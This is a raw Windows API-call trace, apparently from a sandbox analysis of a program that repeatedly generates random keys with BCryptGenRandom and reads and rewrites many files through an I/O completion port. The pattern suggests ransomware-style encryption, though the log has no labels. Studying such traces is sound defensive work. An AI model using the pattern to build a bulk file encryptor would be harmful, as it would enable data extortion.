GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0097.539] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.539] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.539] free (_Block=0x77d800) [0097.539] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.539] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.539] free (_Block=0x2071818) [0097.539] free (_Block=0x2071928) [0097.539] free (_Block=0x77d908) [0097.539] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0097.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.543] WriteFile (in: hFile=0x3b4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8ee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0097.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.610] ReadFile (in: hFile=0x3b4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x4360, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0097.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.644] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x4932, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0097.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0097.674] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x78e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0098.027] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0099.012] CloseHandle (hObject=0x3b0) returned 1 [0099.305] free (_Block=0x1ff1e60) [0099.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.078] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.088] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0100.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0100.094] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.094] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.094] free (_Block=0x77d800) [0100.094] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.094] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.095] free (_Block=0x2071818) [0100.095] free (_Block=0x2071928) [0100.095] free (_Block=0x77d908) [0100.095] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.095] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.116] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.141] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x7d92, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0100.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.154] CloseHandle (hObject=0x3b4) returned 1 [0100.154] free (_Block=0x3d70048) [0100.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.155] CloseHandle (hObject=0x1194) returned 1 [0100.155] free (_Block=0x3ef0008) [0100.155] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.235] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0100.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0100.256] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.256] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.256] free (_Block=0x77d800) [0100.256] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.256] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.256] free (_Block=0x2071818) [0100.256] free (_Block=0x2071928) [0100.256] free (_Block=0x77d908) [0100.256] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0100.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0100.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0100.439] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.439] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.439] free (_Block=0x77d800) [0100.439] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.439] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.440] free (_Block=0x2071818) [0100.440] free (_Block=0x2071928) [0100.440] free (_Block=0x77d908) [0100.440] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0100.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.478] CloseHandle (hObject=0x13e0) returned 1 [0100.479] free (_Block=0x3ef0008) [0100.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.933] ReadFile (in: hFile=0x1194, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1e06, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0100.995] WriteFile (in: hFile=0x3b0, lpBuffer=0x3df015c, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 0x0 [0100.997] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.347] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.354] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0118.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0118.370] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.370] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.370] free (_Block=0x77d7a8) [0118.370] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.370] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.371] free (_Block=0x2071c20) [0118.371] free (_Block=0x2071d30) [0118.371] free (_Block=0x77d8b0) [0118.371] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.382] CloseHandle (hObject=0x3bc) returned 1 [0118.383] free (_Block=0x3d70450) [0118.383] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.395] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xa38, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.405] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x6852, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.414] CloseHandle (hObject=0x2f4) returned 1 [0118.416] free (_Block=0x3ef0008) [0118.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.426] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0118.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.609] CloseHandle (hObject=0x13c0) returned 1 [0118.612] free (_Block=0x1ff1e60) [0118.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0118.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0118.623] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.623] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.623] free (_Block=0x3e305b8) [0118.624] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.624] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.626] free (_Block=0x77d8b8) [0118.626] free (_Block=0x2071c20) [0118.626] free (_Block=0x77d7a8) [0118.626] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.634] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0118.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0118.635] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.635] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.636] free (_Block=0x3e305b8) [0118.636] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.636] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.636] free (_Block=0x77d8b8) [0118.636] free (_Block=0x2071c20) [0118.636] free (_Block=0x77d7a8) [0118.636] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.660] CloseHandle (hObject=0x3bc) returned 1 [0118.664] free (_Block=0x3e70008) [0118.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.687] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5664, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.716] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xb10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0118.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0118.727] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.727] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.727] free (_Block=0x3e305b8) [0118.727] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.727] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.727] free (_Block=0x77d8b8) [0118.727] free (_Block=0x2071c20) [0118.727] free (_Block=0x77d7a8) [0118.727] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.776] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.776] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.777] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.778] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.841] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x318, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.841] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.852] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x432, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.915] 